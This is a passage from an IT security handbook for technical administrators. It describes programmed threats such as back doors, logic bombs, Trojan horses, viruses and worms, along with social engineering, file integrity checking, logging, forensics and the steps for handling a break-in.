basis. What's more, even though many programs are available for download in source code form, many people download pre-compiled binaries. There is no way to assure that the binaries being download actually match the source code from which that were reportedly produced. As an alternative to inspection, only run programs that other people have tested before you. This method isn't fail- safe, because it's possible that the program has an attack that won't trigger for other people but will trigger for you. Or it's possible that the program triggers for many people, but nobody else notices the attack. As a matter of good policy, new software should first be installed on some noncritical systems for testing and familiarization. This practice gives you an opportunity to isolate problems, identify incompatibilities, and note quirks. Don't install new software first on a "live" production system! And never, ever run anything as the superuser or administrator unless you absolutely must. If you are targeted by a knowledgeable insider, that insider may write back doors, logic bombs, Trojan horses, and bacteria directly on the target system using readily-available tools. Your users and especially your staff pose a significant threat to your system's overall security: these people understand the system, know its weaknesses, and know the auditing and control systems that are in place. Legitimate users often have access with sufficient privilege to write and introduce malicious code into the system. Especially ironic, perhaps, is the idea that at many companies the person responsible for security and control is also the person who could cause the most damage if he wished to issue the appropriate commands. Frequently, there is no technical auditing or other checks-and-balances for senior system management. Security tools and toolkits Many programs have been written that can automatically scan for computer security weaknesses. Some of these programs quickly probe the computer on which they are running for system vulnerabilities, while others scan over a network for vulnerabilities that can be exploited remotely. These programs are sometimes called security scanners PART or, more generally, security tools. FIVE Scanners and other tools are double-edged programs. On the one hand, they can be used by professionals for the purpose of securing computer systems: if you can rapidly scan a system for known vulnerabilities, you can use that list of vulnerabilities as a checklist that tells you what to fix. On the other hand, these tools can also be used by perpetrators intent on penetrating computer systems: security scanners give these individuals and organizations a roadmap of how to break into systems. 322 IT SECURITY FOR TECHNICAL ADMINISTRATORS Some security tools are written for professional use, although they can obviously be used by attackers as well. Still more tools are distributed over the Internet exclusively for malicious use. Ironically, the code quality of some malicious tools is very high -- so high that these tools have been taken up by security professionals. The nmap network mapping tool is an example of a tool that was developed by the computer underground and is now widely used by professionals. Rootkits are a special case: these are prepackaged attack toolkits that also install backdoors into your system once they have penetrated superuser account security. Because of the availability of security tools and high-quality attackware, you must be aware of potential vulnerabilities in your systems, and keep them protected and monitored. Obtaining the tools and running them yourself has some merit, but there are also dangers. Some of the tools are not written with safety or portability in mind, and may damage your systems. Other tools may be booby-trapped to compromise your system clandestinely, when you think you are simply scanning for problems. Don't rush to use security scanners yourself unless you are very certain that you understand what they do and how they might help you secure your own system. Back Doors and Trap Doors Back doors, also called trap doors, are pieces of code written into applications or operating systems to grant programmers access to programs without requiring them to go through the normal methods of access authentication. Back doors and trap doors have been around for many years. They're typically written by application programmers who need a means of debugging or monitoring code that they are developing. Most back doors are inserted into applications that require lengthy authentication procedures, or long setups requiring a user to enter many different values to run the application. When debugging the program, the developer may wish to gain special privileges, or to avoid all the necessary setup and authentication steps. The programmer also may want to ensure that there is a method of activating the program should something be wrong with the authentication procedure that is being built into the application. The back door is code that either recognizes some special sequence of input, or is triggered by being run from a certain user ID. It then grants special access. Back doors become threats when they're used by unscrupulous programmers to gain unauthorized access. They are also a problem when the initial application developer forgets to remove a back door after the system has been debugged and some other individual discovers the door's existence. Sometimes, an attacker inserts a back door in a system after he successfully penetrates that system. The back door gives the cracker a way to get back into the system or to gain administrative privileges at a later time. Protecting against backdoors is complicated. The foremost defense is to routinely check the integrity of important files (see chapter 5-3). In addition to checking your files, you should routinely scan the system for privileged files, scan your system for open TCP/IP ports, and periodically check permissions and ownership of important files and directories. Unfortunately, it is now possible to hide the existence, the function, and the triggers of hostile software with great subtlety. As a result, if you allow your system to become compromised, you may not be able to detect that changes have taken place. Logic Bombs Logic bombs are programmed threats that lie dormant in commonly used software for an extended period of time until they are triggered; at this point, they perform a function that is not the intended function of the program in Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 323 which they are contained. Logic bombs usually are embedded in programs by software developers who have legitimate access to the system. Conditions that might trigger a logic bomb include the presence or absence of certain files, a particular day of the week, or a particular user running the application. The logic bomb might check first to see which users are logged in, or which programs are currently in use on the system. Once triggered, a logic bomb can destroy or alter data, cause machine halts, or otherwise damage the system. In one classic example, a logic bomb checked for a certain employee ID number and then was triggered if the ID failed to appear in two consecutive payroll calculations (i.e., the employee had left the company). Time-outs are a special kind of logic bomb that are occasionally used to enforce payment or other contract provisions. Time-outs make a program stop running after a certain amount of time unless some special action is taken, such as paying a license fee. Time-outs are regularly included in beta test software so that users upgrade to newer builds or to the formal release. Protect against malicious logic bombs in the same way that you protect against back doors: don't install software without thoroughly testing it and reading it. Keep regular backups so that if something happens, you can restore your data. Trojan Horses Analogous to their namesake, modern-day Trojan horses resemble a program that the user wishes to run--a login process, a game, a spreadsheet, or an editor. While the program appears to be doing what the user wants, it actually is doing something else unrelated to its advertised purpose, and without the user's knowledge. For example, the user may think that the program is a game. While it is printing messages about initializing databases and asking questions like "What do you want to name your player?" and "What level of difficulty do you want to play?" the program may actually be deleting files, reformatting a disk, or posting confidential documents to a web site across the globe. Trojan horses are, unfortunately, as common as jokes within some environments. They are often planted as cruel tricks on hacker web sites and circulated among individuals as shared software. Trojan horses have been found in installation programs and scripts. Shell files (especially shar files), VBS, awk, Perl, and sed scripts, TeX files, PostScript files, MIME-encoded mail, and web pages can all contain commands that can cause you unexpected problems. Even text files can be dangerous. Some editors allow commands to be embedded in the first few lines or the last few lines of files to let the editor automatically initialize itself and execute commands (see the documentation for your own editor to see how to disable this feature). If you are unpacking files or executing scripts for the first time, you might wish to do so on a secondary machine or use a restricted environment to prevent the package from accessing files or directories outside its work area (Unix provides this feature via the chroot() system call). Another form of a Trojan horse makes use of block-send commands or answerback modes in some serial terminals that were developed in the 1970s and 1980s (and that are emulated by many terminal emulation programs written PART since, including Microsoft's HyperTerminal). Many brands of terminals have modes where certain sequences of control characters will cause the current line or status line to be answered back to the system as if it had been typed on FIVE the keyboard. Thus, a command embedded in mail may direct the terminal to send a "delete all files and log out" command to the operating system, followed by a "clear screen" sequence to the terminal. Avoid or disable this feature on your terminal or emulator. 324 IT SECURITY FOR TECHNICAL ADMINISTRATORS Viruses A true virus is a sequence of code that is inserted into other executable code, so that when the regular program is run, the viral code is also executed. The viral code causes a copy of itself to be inserted in one or more other programs. Viruses are not distinct programs--they cannot run on their own, and they need to have some host program, of which they are a part, executed to activate them. Nearly all viruses target personal computers running popular operating systems. such as Microsoft DOS, Microsoft Windows, and Apple MacOS. Viruses can propagate on operating systems that offer relatively little protection, such as DOS and MacOS Versions prior to 10, and those that offer high degrees of protection, such as Microsoft Windows NT and XP. Viruses have also been written for UNIX systems; virus authors have even created cross-platform viruses that can infect both Windows and Unix-based system. Viruses that target PC boot sectors can infect systems running BSD or Linux as easily as Windows if an infected floppy disk is booted (although they often cannot spread further). Viruses are a powerful tool for attackers. While any task that can be accomplished by a virus can be accomplished through other means, viruses are able to spread without the involvement or direction of the attacker. They can also spread to areas that the attacker cannot personally reach. You can protect yourself against viruses using the same techniques you use to protect your system against back doors and crackers. On Intel-based PCs, it's also important not to boot from untrusted disks. Anti-virus software is now considered a basic requirement for corporate and home PCs. Despite this, more machines lack anti-virus software than have it. Almost as unfortunate is the fact that many people who have purchased anti-virus software have failed to update the virus signatures recently, thus rendering the software largely useless against current threats. Worms Worms are programs that can run independently and travel from machine to machine across network connections; worms may have portions of themselves running on many different machines. Worms do not change other programs, although they may carry other code that does (for example, a true virus). There have been dozens of network worms that have targeted many different operating systems. Perhaps the most common propagate by e-mail, often extracting e-mail addresses from the infected system's e-mail application's address book and sending itself to those users claiming to be an important message from the infected system's owner (or from other users whose address is in the owner's address book.) Protecting against worm programs requires the same techniques as protecting against break-ins. If an intruder can enter your machine, so can a worm. If your machine is secure from unauthorized access, it should be secure from the worm as well. All of our advice about protecting against unauthorized access applies here. If you suspect that your machine is under attack by a worm program across the network, call one of the computer- incident response centers to see if other sites have made similar reports. You may be able to get useful information about how to protect or recover your system in such a case. Consider severing your network connections immediately to isolate your local network. If there is already a worm program loose in your system, you may help prevent it from spreading, and you may also prevent important data from being sent outside of your local area network. If you've done a good job with your backups and other security, little should be damaged. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 325 Blended Threats Most of the newer and more dangerous programmed threats are blended threats. A blended threat is a programmed attack that combines the features of several other kinds of attacks and propagates through multiple vectors. A typical blended threat might be a network worm that propagates by e-mailing copies of itself to addresses in the infected computer's address book or through file sharing with other connected systems; once infected, the worm installs a back door, a zombie for coordinating a future distributed denial of service attack, and a logic bomb. Defending against blended threats is like defending against single-vector attacks, but requires that you consider all of the vectors. A layered defense is the best practice for avoiding blended threats. Social Engineering On many computer systems it is possible to exploit bugs or other vulnerabilities to parlay ordinary access granted to normal users into "superuser" or "administrative" access that is granted to system operators. Thus, with a stolen username and password, a moderately skilled attacker can gain full run of many systems. One of the most common ways for an attacker to get a username and password is social engineering. Social engineering is one of the simplest and most effective means of gaining unauthorized access to a computer system. For a social engineering attack, an attacker basically telephones the target organization and tries to socially extract information. For example, the attacker might pretend to be a new employee who has forgotten the password for his or her account and needs to have the password "reset." Or the attacker might pretend to be a service representative, claiming that the Administrator account needs to have its password changed so that routine maintenance can be performed. Social engineering attacks are effective because people generally want to be helpful ­ they are the computer equivalent of confidence games. Social engineering can also be automated. There are many so-called phishing programs that will send social engineering e-mails to thousands or tens of thousands of users at a time. Some programs solicit usernames and passwords. Others try for valid credit cards. The most effective defense against social engineering is a vigorous user education program. Users should be taught (and reminded frequently) not to divulge any security-related information to anyone they do not know already to be an authentic organization security employee, and then only in person. Users should be told that security personnel will never ask them to divulge their passwords, credit card numbers, or other authenticators, and anyone or any message that does should be immediately reported to the computer staff. PART FIVE 326 IT SECURITY FOR TECHNICAL ADMINISTRATORS CHAPTER 9. DETECTING AND MANAGING A BREAK-IN At a Glance Despite your best efforts, you may have to deal with a compromised system. This chapter discusses how you can use auditing, logging, and forensics to help detect compromises and identify what's been modified on a compromised system, and provides step by step guidance for how to recover from an attack. Auditing and Logging After you have established the protection mechanisms on your system, you will want to be sure that your protection mechanisms actually work. You will also want to observe any indications of misbehavior or other problems. This process is known as monitoring or auditing. Two of the most common audits are inspections of file integrity and review of system log files. File Integrity Checks Although there are many reasons that you might want to examine the integrity of your system's files, one of the most common reasons is to determine what has changed after a computer has been attacked, broken into, and compromised. There are basically three approaches to detecting changes to files: 1. Use comparison copies of the data to be monitored; this is the most certain way. 2. Monitor metadata about the items to be protected; this includes monitoring the modification time of entries as kept by the operating system, and monitoring any logs or audit trails that show alterations to files. 3. Use some form of signature of the data to be monitored, and periodically recompute and compare the signature against a stored value. Each of these approaches has drawbacks and benefits. Whichever you choose, there are several ways you can examine a potentially compromised system: · Physically remove the hard disk from the computer in question, attach the disk to a second computer as an auxiliary disk, boot the second computer, mount the disk read-only, and use the second computer's operating system to examine the disk (or make a block-for-block copy to examine). · Leave the suspect disk in the suspect computer, but boot the suspect computer with a clean operating system from a CD-ROM or a floppy disk. Then, using only the tools on the CD-ROM or floppy, you could proceed to mount the suspect disk read-only and analyze the possibly compromised filesystem. · Log into the suspect computer and run whatever integrity-checking tools happen to be installed. Clearly, the most thorough way to examine the suspect system is the first technique. In practice, the third technique is the most common, but is completely inadequate. If an attacker truly compromises your computer system, nothing can be trusted ­ including the integrity-checking software or databases. Comparison Copies The safest and most direct method of detecting changes to data is to keep a copy of the unaltered data, and do a byte-by-byte comparison when needed. If there is a difference, this indicates not only that a change occurred, but what that change involved. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 327 Comparison copies, however, are unwieldy. They require that you keep copies of every file of interest. Not only does such a method require twice as much storage as the original files, it also may involve a violation of license or copyright of the files (in general, copyright laws allow one copy for archival purposes, and your distribution media is that one copy).243 To use a comparison copy means that both the original and the copy must be read through, byte by byte, each time a check is made. And, of course, the comparison copy needs to be saved in a protected location. Even with these drawbacks, comparison copies have a particular benefit--if you discover an unauthorized change, you can simply replace the altered version with the saved comparison copy, thus restoring the system to normal. These copies can be made locally, at remote sites, or over the network, as we describe in the following sections. Local copies One standard method of storing comparison copies is to put them on another disk, particularly on removable media. Many people report success with storing copies of critical system files on removable media drives.244 If there is any question about a particular file, the appropriate disk is placed in the drive, mounted, and compared. If you are careful about how you configure these disks, you get the added (and valuable) benefit of having a known good version of the system to boot up if the system is compromised by accident or attack. Making regular backups to removable or write-once media such as tapes and CDs can provide similar benefits. A second standard method of storing comparison copies is to make on-disk copies somewhere else on the system. You can compress and/or encrypt the copy to help reduce disk use and keep it safe from tampering. The disadvantage to compression and encryption is that it then requires extra processing to recover the files if you want to compare them against the working copies. This extra effort may be significant if you wish to do comparisons daily (or more often!). Moreover, you can't protect the encryption program itself this way. Remote copies A third method of using comparison copies is to store them on a remote site and make them available remotely in some manner. For instance, you might place copies of all the system files on a disk partition on a secured server, and export or share that partition read-only using NFS or some similar protocol. All the client hosts could then mount that partition and use the copies in local comparisons. Of course, you need to ensure that whatever programs are used in the comparison are taken from the remote partition and not from the local disk. Otherwise, an attacker could modify those files to not report changes! Another method of remote comparison involves using a program such as rdist to do the comparison across the network. (PUIS, 626-627) Remember that it is not enough to keep copies of executable programs. Shared libraries and configuration files must usually be compared as well. Checklists and Metadata Saving an extra copy of each critical file and performing a byte-by-byte comparison can be unduly expensive. It requires substantial disk space to store the copies. Furthermore, if the comparison is performed over the network, it PART will involve substantial disk and network overhead each time the comparisons are made. FIVE A more efficient approach is to store a summary of important characteristics of each file and directory. When the time comes to do a comparison, the characteristics are regenerated and compared with the saved information. If 243Copyright laws--and many licenses--do not allow for copies on backups. 244Note that an external Firewire-based disk drive fits this description. 328 IT SECURITY FOR TECHNICAL ADMINISTRATORS the characteristics are comprehensive and smaller than the file contents (on average), then this method is clearly a more efficient way of doing the comparison. Furthermore, this approach can capture changes that a simple comparison copy cannot: comparison copies detect changes in the contents of files, but do little to detect changes in metadata such as file owners, protection modes, or modification times. These data are sometimes more important than the data within the files themselves. For instance, changes in owner or protection bits may result in disaster if they occur to the wrong file or directory. The simplest form of a checklist mechanism is to list the files with their attributes, and compare the output against a saved version of the list. It's usually necessary to include all the ancestor directories of important files in the checklist as well. Checksums and Signatures Unfortunately, simple checklists can be defeated with a little effort. Files can be modified in such a way that the information you monitor will not disclose the change. For instance, a file might be modified by writing to the raw disk device after the appropriate block is known. As the modification did not go through the filesystem, none of the information about file change time will be altered. Or an attacker could set the system clock back to the time of the last legitimate change, edit the file, and set the clock forward again. To protect against these threats, we can generate a signature for each file, and compare file signatures. A good file signature must depend on every bit in the file, and it should be infeasible for an attacker to create another file that produces the same signature. These requirements disqualify simple checksum algorithms (like CRC), but are met by cryptographic message digests (discussed in chapter 5-3). Well-developed software for file integrity checking computes at least one, and often several cryptographic digests of each file and its metadata. When a known good copy of the checker is used to generate file signatures in advance, and these signatures are stored safely (on write-once or removable media, for example) any changes to the files can be detected by running the known good copy again and comparing the signatures. One well known multi-platform package for doing this is Tripwire (http://www.tripwire.com); an open source version is available for Linux at no cost. Log Files A log file is a file that records one or more log events -- that is, a specific action, activity or condition that the author of a program thought might be worth recording. Log files are an important building block of a secure system: they form a recorded history, or audit trail, of your computer's past, making it easier for you to track down intermittent problems or attacks. Using log files, you may be able to piece together enough information to discover the cause of a bug, the source of a break-in, or the scope of the damage involved. In cases where you can't stop damage from occurring, at least you will have some record of it. Those logs may be exactly what you need to rebuild your system, conduct an investigation, give testimony, recover insurance money, or get accurate field service performed. Logs can be recorded in multiple locations: · The logs can be stored on the computer responsible for the log event. For example, on modern Unix systems, logs are stored in the directory /var/log, although other directories can be used by specific programs in specific cases. Windows NT-based systems collect messages from the operating system and applications about events and store them in a unified log file (often C:\WINNT\system32\config\SysEvent.Evt), although individual applications may also maintain their own log files. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 329 · The logs can be sent over the network to a remote computer to be aggregated and stored. This computer, sometimes called a log server, can be used as a central location for monitoring many computers on a network. A log server can further be configured with a host-based firewall so that it can receive log information from other computers, but so that the computer is prohibited from transmitting any packets on the network. Using a remote log server helps prevent attackers from erasing their tracks. A centralized, remote logging system may also be an ideal place to run intrusion detection software on the collected logs. · The logs can be written to write-once media or printed on a printer. These logs are virtually impossible to erase without physical access, but can become unwieldy to maintain. For security reasons, some information should never be logged. For example, although you should log failed password attempts, you should not log the password that was used in the failed attempt. Users frequently mistype their own passwords, and logging these mistyped passwords would help an attacker break into a user's account. Some system administrators believe that the account name should also not be logged on failed login attempts-- especially when the account typed by the user is nonexistent. The reason is that users occasionally type their passwords when they are prompted for their usernames. Essential Log Events Although different systems and applications log different events, some kinds of events are essential, and should be logged by any reasonably secure computer: · Network connections from remote hosts, dialup connections on modems, and dial-out connections by modems. In some cases, logging overall data traffic patterns may reveal excessive outgoing data caused by an attacker using the computer as a staging ground for pirated software, or publishing your confidential data. · User login times and locations. Seeing someone logging into the account of a local user from out of the country or at unusual hours may signal an intruder. · Failed login attempts, which may alert you to attackers knocking on your computer's door. · Process-level accounting, including process start and end times, ownership and privileges, and CPU utilization. This kind of accounting can reveal every command issued on your system, and is very helpful in analyzing security breaches ­ if it's intact. · System shutdowns and reboots. Unexpected reboots may indicate a hardware problem, an attacker with physical access restarting the system in single-user mode, or a remote attacker covering his tracks in memory. · Exceptional events reported by the operating system (such as disk full conditions). These always require attention, whether or not they are caused by an attacker. Every event that's logged should include the process that generated the event and the date and time that it occurred. Most logging systems assign each logged event to a category or facility that describes the source of the event (such as `mail' or `network' or `kernel'), and a priority or severity that describes the importance of the event (such as `informational', `warnings', or `critical error'). Here is an example of a message logged by a Unix system: Aug 14 08:02:12 r2 postfix/local[81859]: 80AD8E44308: to=, relay=local, delay=1, status=bounced (unknown user: "jhalonen") PART This message was generated by the postfix program called local. It reports that an e-mail message with the id 80AD8E44308 was received for the user jhalonen@ex.com. The message was bounced, because there is no user FIVE jhalonen@ex.com. The event's facility is mail; the priority is info. (See PUIS, 642-654 for a detailed discussion of Unix logging facilities, priorities, and configuration.) 330 IT SECURITY FOR TECHNICAL ADMINISTRATORS Log File Analysis It's not enough to log events ­ you must read the logs. On a busy server that may log hundreds or thousands of events an hour, this can be a daunting task. Log file analysis programs attempt to streamline the job by filtering log files to direct your attention toward important events and away from routine ones. Some analysis software, like Microsoft's Event Viewer, lets you interactively view logs through filters of your choice. Other software, like the Swatch program often used on Unix servers, monitors logs in real-time and issues alerts when important events occur. (PUIS, 654-657) Program-Specific Log Files Most application programs, especially daemons, will maintain their own log files. FTP and web servers routinely log connections and file transfers, DNS name servers log domain transfers and queries, database servers log queries, and mail servers routinely log connection and message size information when sending or receiving messages. Errors and exceptional conditions are nearly always logged. In many cases, application-specific log analysis tools have been developed to summarize these logs in a more useful fashion. Handwritten Logs Another type of logging that can help you with security is not done by the computer at all; it is done by you and your staff. Keep a log book that records your day's activities. Log books should be kept on paper in a physically secure location. Because you keep them on paper, they cannot be altered by someone hacking into your computer even as superuser. They will provide a nearly tamperproof record of important information. Handwritten logs have several advantages over online logs. You can record things that the computer won't, like bomb threats. You can access paper logs when the system is down. In some countries, there can be legal advantages to paper logs as evidence. The biggest problem with log books is the amount of time you need to keep them up to date. These are not items that can be automated with a shell script. Unfortunately, this time requirement is the biggest reason why many administrators are reluctant to keep logs--especially at a site with hundreds (or thousands) of machines, each of which might require its own log book. We suggest that you try to be creative and think of some way to balance the need for good records against the drudgery of keeping multiple books up to date. Compressing information, and keeping logs for each cluster of machines are ways to reduce the overhead while receiving (nearly) the same benefit. There are basically two kinds of log books: per-site logs and per-machine logs. In a per-site log book, you want to keep information that would be of use across all your machines and throughout your operations. The information can be further divided into exception and activity reports (power outages, alarm tests and triggers, personnel actions on employees with privileged access), and informational material (contact information, receipts for hardware and software, equipment serial numbers, MAC addresses for Ethernet machines, copies of router configurations, etc.). Each machine should also have a log book associated with it. In a per-machine log, exception and activity reports include notes about system crashes, downtimes, account creation and deletion, password changing, software installation, and system backups. Informational material might include copies of configuration files, lists of patches applied, and disk configurations. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 331 Managing Log Files Here are several final suggestions about log files: Backups Ensure that all of your log files are copied to your backup media on a regular basis, preferably daily. The timing of the backups should be such that any file that is periodically reset is copied to the backups before the reset is performed. This will ensure that you have a series of records over time to show system access and behavior. Review Review log files at least daily. Keeping log records does you little service if you do not review them on a regular basis. Log files can reveal problems with your hardware, with your network configuration, and (of course) with your security. Processing Filter your log files with analysis software. Many log messages record nothing of particular interest. You may become so accustomed to seeing this material that you get in the habit of making only a cursory scan of the messages to see if something is wrong, and this way you can easily miss an important message. Filtering requires some care. You do not want to write a filter that selects those important things you want to see and discards the rest. Such a system is likely to result in an important message being discarded without being read. Instead, you should filter out the boring messages, being as specific as you can with your pattern matching, and pass everything else to you to be read. Periodically, you should also study unfiltered log messages to be sure that you are not missing anything of importance. Trust Don't trust your logs completely! Logs can often be altered or deleted by an intruder who obtains superuser privileges. Local users with physical access or appropriate knowledge of the system may be able to falsify or circumvent logging mechanisms. And, of course, software errors and system errors may result in logs not being properly collected and saved. Thus, you need to develop redundant scanning and logging mechanisms: because something is not logged does not mean it didn't happen. Of course, simply because something was logged doesn't mean it did happen, either--someone may cause entries to be written to logs to throw you off the scent of a real problem or to point a false accusation at someone else. Forensics The information in log files is, for the most part, intentionally put there as a result of a programmer's decision. But a running system records other information as well. In recent years, there has been significant interest in computer forensics, the art of reading the tracks that are left in a computer system. Although not obvious, some files are often kept on a per-user basis can be helpful in analyzing when something PART untoward has happened on your system. While not real log files, as such, these files can be treated as possible sources of information on user behavior. FIVE 332 IT SECURITY FOR TECHNICAL ADMINISTRATORS Shell History Many of the standard Unix user command shells, including bash, csh, tcsh, and ksh, can keep a history file. When the user issues commands, the text of each command and its arguments are stored into the history file for later re- execution. If you are trying to recreate activity performed on an account, possibly by some intruder, the contents of this file can be quite helpful when coupled with system log information. You must check the modification time on the file to be sure that it was in use during the time the suspicious activity occurred. If it was created and modified during the intruder's activities, you should be able to determine the commands run, the programs compiled, and sometimes even the names of remote accounts or machines that might also be involved in the incident. Be sure of your target, however, because this is potentially a violation of privacy for the real user of this account. Obviously, an aware intruder will delete the file before logging out. In some cases, however, you can preserve the file either by forcing the intruder to log out, by making a hard link to the file elsewhere before the intruder logs out, or by recovering the deleted file. (PUIS, 677-678) Mail Some user accounts are configured to make a copy of all outgoing mail in a file. If an intruder sends mail from a user account where this feature is set, the message copies can provide you with potentially useful information. In at least one case we know of, a person stealing confidential information by using a coworker's pirated password was exposed because of recorded e-mail to his colleagues that he signed with his own name! Network Setup Each user account may have several network configuration properties or files that can be edited to provide shortcuts for commands, or to assert access rights. Sometimes, the information in these files will provide a clue as to the activities of a malefactor. Unix examples include the .rhosts, .ssh/known_hosts, and .ssh/authorized_keys files for remote logins, and the .netrc file for FTP. Examine these files carefully for clues, but remember: the presence of information in one of these files may have been there prior to the incident, or it may have been planted to throw you off. Handling a Break-in You should have an action plan prepared to deal with a security breach. Particularly security-conscious organizations should practice the plan. Here are the key components you should include: Step 1: Identify and understand the problem. Don't panic, and don't act without thinking. If you don't know what the problem is, you cannot take action against it. This rule does not mean that you need to have perfect understanding, but you should understand at least what form of problem you are dealing with. Cutting your organization's Internet connection won't help you if the problem is being caused by a revenge-bent employee with a laptop who is hiding out in a co-worker's office. Step 2: Document. Whether your goal is to get your system running again as soon as possible, or to collect evidence for a prosecution, you will be better off if you document what you do. Start a paper log immediately. Take a notebook and write down everything you find, noting the date and time. If you examine text files, print copies, and then sign and date the hardcopy. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 333 In larger organizations, there may be an internal response team or security officer tasked to handle break-ins, contain damage, or coordinate responses. If your organization has such an internal incident reporting system, insure that they are involved at an early stage to assist with preservation of documentation as well as response. Step 3: Contain or stop the damage. If you've identified the problem, take immediate steps to halt or limit it. For instance, if you've identified the employee who is deleting system files, you'll want to turn off his account, and probably take disciplinary action as well. Both are steps to limit the damage to your data and system. Step 4: Confirm your diagnosis and determine the damage. After you've taken steps to contain the damage, confirm your diagnosis of the problem and determine the damage it caused. Are files still disappearing after the employee has been discharged? You may never be 100% sure if two or more incidents are actually related. Furthermore, you may not be able to identify all of the damage immediately, if ever. Step 5: Preserve the evidence, if necessary. If you intend to prosecute or seek legal redress for your incident, you must make an effort to preserve necessary evidence before going further. Failure to preserve evidence does not prohibit you from calling the police or filing a suit against the suspected perpetrator, but the lack of evidence may significantly decrease your chances for success. Be advised: preserving evidence can take time and is hard to do properly. For this reason, many organizations dealing with incidents forgo this step. Step 6: Restore your system. After you know the extent of the damage, you need to restore the system and data to a consistent state. This may involve reloading portions of the system from back-ups, or it may mean a simple restart of the system. Before you proceed, be certain that all of the programs you are going to use are "safe." The attacker may have replaced your restore program with a Trojan horse that deletes both the files on your hard disk and on your backup tape! Step 7: Deal with the cause. If the problem occurred because of some weakness in your security or operational measures, you'll want to make changes and repairs after your system has been restored to a normal state. If the cause was a person making a mistake, you will probably want to educate him or her to avoid a second occurrence of the situation. If someone purposefully interfered with your operations, you may wish to involve law enforcement authorities. Step 8: Perform related recovery. If damage caused by the attack is covered by insurance, you may need to file claims. Rumor control, and perhaps even community relations, will be required at the end of the incident to explain what happened, what breaches occurred, and what measures were taken to resolve the situation. This step is especially important with a large user community, because unchecked rumors and fears can often damage your operations more than the problem itself. Step 9: Postmortem. Once the heat has died down, review the incident and your handling of it. How could you and your team have handled the situation better? What effort was wasted? What wrong decisions were made? How could you have PART prevented it from happening in the first place? FIVE In addition to having a plan of action, you can be prepared by creating a toolkit on read-only media (floppy, CD, etc.) This toolkit will give you a set of programs for incident response that you know are not compromised. Include programs that you will need to examine a compromised system. For a Unix system, these might include: awk, bash, cat, compress, cut, dd, des, df, du, file, find, grep, gzip, icat, ifconfig, last, ls, lsmod, lsof, md5sum, modinfo, more, 334 IT SECURITY FOR TECHNICAL ADMINISTRATORS netcat, netstat, nmap, paste, pcat, perl, pgp, pkginfo, ps, rpm, rm, script, sed, strings, strace, tar, top, truss, uncompress, vi, and w. Don't forget shared libraries (or insure that the programs are statically linked). Having a bootable live filesystem on your CD or DVD is useful as well. One particularly handy toolkit is Knoppix (http://www.knoppix.org), a bootable live Linux CD that includes a myriad of analysis and forensics tools. Because Linux can mount Microsoft FAT file systems and other Unix file systems, a Knoppix CD makes an excellent general forensic toolkit. Discovering an Intruder There are several ways you might discover a break-in: · Catching the perpetrator in the act. For example, you might see the superuser logged in from a cyber-cafe in Budapest when you are the only person who should know the superuser password. · Deducing that a break-in has taken place based on changes that have been made to the system. For example, you might receive an electronic mail message from an attacker taunting you about a security hole, you may discover new accounts, or your network connection might be running very slowly because the bandwidth is being used by people downloading copyrighted software. · a message from a system administrator at another site indicating strange activity at his or her site that has originated from an account on your machine. · Strange activities on the system, such as system crashes, significant hard disk activity, unexplained reboots, minor accounting discrepancies, or sluggish response when it is not expected. There are a variety of programs that you can use to check files and processes that might lead you to discover a break-in. Use these tools on a regular basis, but use them sporadically as well. This introduces an element of randomness that can keep perpetrators from being able to cover their tracks. This principle is a standard of operations security: try to be unpredictable. What to Do When You Catch Somebody You have a number of choices when you discover an intruder on your system: 1. Ignore them -- they might go away. This is generally a poor choice. Ignoring an intruder who is on your system essentially gives him free reign to do harm to you, your users, and others on the network. You may also put yourself at risk for downstream liability if the intruder causes damages at another organization and you had the chance to stop him. 2. Try to contact them, and ask them what they want. Be extremely careful if you pursue this course of action. Some intruders are malicious in intent, or extremely paranoid about being caught. If you contact them, they may react by trying to delete everything on your computer so as to hide their activities. Trace the intruder before you contact them, and document every contact. 3. Monitor the intruder. This will give you an idea of whether the intruder is modifying your accounting database or simply rummaging around through your users' e-mail. However, keep in mind that you don't know how long this intruder has been on your system, so all you can really monitor is what is done next. If the intruder is logged in over a network connection, you can use a packet monitor such as tcpdump, ethereal, or snoop to either display the user's packets or record them in a file. If your computer is attached to a hub, another computer on the same network may be able to capture packets unobtrusively. If your intruder is logged on through a modem or serial port that is connected directly to your computer, there are several programs that you can use to monitor the intruder's actions, including ttywatch, conserver, rtty, and ser2net. These programs can give you a detailed, byte-by-byte account of the information that is sent over one Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 335 or more serial ports. In many cases, they can also monitor pseudo-ttys, which is valuable when the attacker has connected over the network using an encrypted protocol such as SSH. In some countries, monitoring an intruder may be illegal, or may only be legal if you have a banner telling all users that they may be monitored. 4. Try to trace the connection and identify the intruder. If the intruder has called your computer by telephone, your options will depend on the services offered by your telephone company; some offer a caller id service or caller tracing services. If the intruder has logged in over the network, the who or netstat commands may quickly identify the computer that originated the connection. You can then contact the system administrator of the remote machine (by telephone!) for further tracing; administrator contact information can often be found in the whois registry for their domain name, or on the organization's web site. Another option is to use a traceroute program (traceroute or tracert.exe) to identify the network provider for the remote machine. If all else fails, you might send e-mail to root or postmaster at the remote machine asking them to call you; don't mention the break-in, however, as the intruder may be monitoring that account. 5. Break their connection by killing their processes, unplugging the modem or network, or turning off your computer. Killing your computer's power--turning it off--is the very quickest way to get an intruder off your computer and prevent him from doing anything else--including possibly further damage. Unfortunately, this is a drastic action. Not only does it stop the intruder, but it also interrupts the work of all of your legitimate users. It may also delete evidence you night need in court some day, delete necessary evidence of the break-in, such as running processes, and cause the system to be damaged when you reboot because of Trojaned startup scripts. In addition, many file systems do not deal with sudden power loss very gracefully: pulling the plug might do significantly more damage than the intruder might ever do. On Unix systems, you can use the ps command to get a list of the intruder's processes and the kill command to stop them, after you change the password on the account that the intruder is using. On Windows systems, the Task Manager serves these functions. If the intruder is connecting over a network, you can break that network connection by programming your firewall or router to drop packets from the user's host, or unplug the network connector altogether; if the intruder has dialed in over a telephone line, you can turn off the modem--or unplug it from the back of the computer. 6. Contact your Internet Service Provider, an incident response team, or law enforcement official to notify them of the attack. After the Attack The remainder of this chapter discusses in detail how to find out what an intruder may have done and how you should clean up afterwards. PART Analyzing the Log Files Even if you don't catch 